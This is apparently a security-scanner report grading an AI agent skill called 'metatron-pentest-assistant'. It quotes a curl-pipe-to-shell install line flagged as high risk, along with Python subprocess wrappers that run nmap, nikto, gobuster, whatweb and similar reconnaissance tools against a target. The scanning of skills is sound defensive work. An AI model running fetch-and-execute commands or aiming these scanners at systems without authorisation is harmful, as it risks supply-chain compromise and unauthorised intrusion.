metatron-pentest-assistant

github.com/aradotso/trending-skills
Verdict: Proceed with caution
0 critical1 high9 medium
C
SCORE 55 / 100
$skillox install metatron-pentest-assistantSoon
Sign in to followFollowing emails you when a re-scan drops the grade. Opt-out is per-creator on /account/billing.

Why grade C?

score · 55 / 100

The current grade reflects 9 medium findings (6+ MEDs → C).

0 CRIT1 HIGH9 MED0 LOW
To reach a higher grade
  • B
    Reach Btarget score 75

    Resolve 4 of 9 MED (cap is 5).

  • A
    Reach Atarget score 95

    Resolve all 1 HIGH + 7 of 9 MED (cap is 2).

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Latest scan findings

Scan crawl-gw7erb5xuebkarf6csp0uy0f · Thu, 28 May 2026 17:30:27 GMT · 2ms

high
Dangerous shell pattern: curl | shell
The skill contains a shell command pattern (`curl | shell`) commonly used in destructive or supply-chain attacks.
rule: dangerous-shellline: 59CWE-78
57
58```bash
59curl -fsSL https://ollama.com/install.sh | shcurl | shell — common in destructive or supply-chain attacks
60
61# 8GB+ RAM:
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-executionline: 266CWE-78
264def run_nmap(target: str) -> str:
265 """Run nmap service/version scan."""
266 result = subprocess.run(spawns a subprocess outside declared capabilities
267 ["nmap", "-sV", "-sC", "-T4", target],
268 capture_output=True, text=True, timeout=120
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-executionline: 273CWE-78
271
272def run_whois(target: str) -> str:
273 result = subprocess.run(spawns a subprocess outside declared capabilities
274 ["whois", target],
275 capture_output=True, text=True, timeout=30
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-executionline: 280CWE-78
278
279def run_whatweb(target: str) -> str:
280 result = subprocess.run(spawns a subprocess outside declared capabilities
281 ["whatweb", "-a", "3", target],
282 capture_output=True, text=True, timeout=60
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-executionline: 287CWE-78
285
286def run_curl_headers(target: str) -> str:
287 result = subprocess.run(spawns a subprocess outside declared capabilities
288 ["curl", "-I", "-L", "--max-time", "15", target],
289 capture_output=True, text=True, timeout=20
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-executionline: 294CWE-78
292
293def run_dig(target: str) -> str:
294 result = subprocess.run(spawns a subprocess outside declared capabilities
295 ["dig", target, "ANY"],
296 capture_output=True, text=True, timeout=15
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-executionline: 302CWE-78
300def run_nikto(target: str) -> str:
301 """Slow but thorough web scanner."""
302 result = subprocess.run(spawns a subprocess outside declared capabilities
303 ["nikto", "-h", target],
304 capture_output=True, text=True, timeout=300
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-executionline: 506CWE-78
504# In tools.py — add your tool function:
505def run_gobuster(target: str, wordlist: str = "/usr/share/wordlists/dirb/common.txt") -> str:
506 result = subprocess.run(spawns a subprocess outside declared capabilities
507 ["gobuster", "dir", "-u", f"http://{target}", "-w", wordlist],
508 capture_output=True, text=True, timeout=180
med
Arbitrary subprocess execution detected
The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.
rule: subprocess-executionline: 562CWE-78
560Nikto is slow by design. Either use `[a]` (all without nikto) or increase the subprocess timeout in `tools.py`:
561```python
562result = subprocess.run(["nikto", "-h", target],spawns a subprocess outside declared capabilities
563 capture_output=True, text=True,
564 timeout=600) # 10 minutes
med
No capability manifest declared
The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.
rule: no-manifest
View latest scan →
skillox.io/c/metatron-pentest-assistant